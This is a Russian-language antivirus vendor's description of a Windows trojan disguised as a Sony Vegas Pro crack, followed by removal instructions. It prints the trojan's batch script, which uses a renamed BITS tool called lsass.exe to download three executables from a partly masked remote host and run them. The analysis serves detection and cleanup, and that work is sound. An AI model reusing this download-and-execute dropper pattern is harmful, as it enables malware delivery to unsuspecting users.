| Время детектирования | 04 сен 2009 16:43 MSK |
| Время выпуска обновления | 04 сен 2009 20:38 MSK |
| Описание опубликовано | 24 сен 2010 16:22 MSK |
Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 171008 байт. Написана на C++.
После запуска троянец выполняет следующие действия:
%Temp%\IXP000.TMP\lsass.exe (118784 байта) %Temp%\IXP000.TMP\w.bat (49 байт)Сценарий содержит следующие строки:
@echo off %SystemRoot%\System32\cmd.exe /C r.bat %Temp%\IXP000.TMP\r.bat (567 байт)Сценарий содержит следующие строки:
@echo off ren lsass lsass.exe start "" "sony.vegas.pro.80b.build.217-nope.exe" net start bits IF NOT EXIST C:\nul mkdir C:\ lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/ic3.exe "C:\ecic3.exe" IF NOT EXIST C:\nul mkdir C:\ lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/IC.exe "C:\exic.exe" IF NOT EXIST C:\nul mkdir C:\ lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/db.exe "C:\exdb.exe" start "" "C:\ecic3.exe" start "" "C:\exic.exe" start "" "C:\exdb.exe" %Temp%\IXP000.TMP\sony.vegas.pro.80b.build.217-nope.exe (69521 байт)
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,Таким образом, при следующем старте системы каталог "%Temp%\IXP000.TMP" будет удален.
DelNodeRunDLL32 "%Temp%\IXP000.TMP\""
Запуск сценария "r.bat" приводит к выполнению следующих действий:
http://bulg***ave.com/ic3.exe http://bulg***ave.com/IC.exe http://bulg***ave.com/db.exeЗагруженные файлы сохраняются в корневом каталоге диска C: соответственно под следующими именами:
C:\ecic3.exe C:\exic.exe C:\exdb.exeНа момент создания описания по всем приведенным ссылкам загружалась html-страница следующего содержания:

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
lsass.exe sony.vegas.pro.80b.build.217-nope.exe
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,
DelNodeRunDLL32 "%Temp%\IXP000.TMP\""
%Temp%\IXP000.TMP\lsass.exe %Temp%\IXP000.TMP\w.bat %Temp%\IXP000.TMP\r.bat %Temp%\IXP000.TMP\sony.vegas.pro.80b.build.217-nope.exe C:\ecic3.exe C:\exic.exe C:\exdb.exe
%Temp%\IXP000.TMP
Вредоносная программа, предназначенная для осуществления несанкционированных пользователем действий, влекущих уничтожение, блокирование, модификацию или копирование информации, нарушение работы компьютеров или компьютерных сетей, и при всём при этом не попадающая ни под одно из других троянских поведений.
К Trojan также относятся «многоцелевые» троянские программы, т.е. программы, способные совершать сразу несколько несанкционированных пользователем действий, присущих одновременно нескольким другим поведениям троянских программ, что не позволяет однозначно отнести их к тому или иному поведению.
Trojan.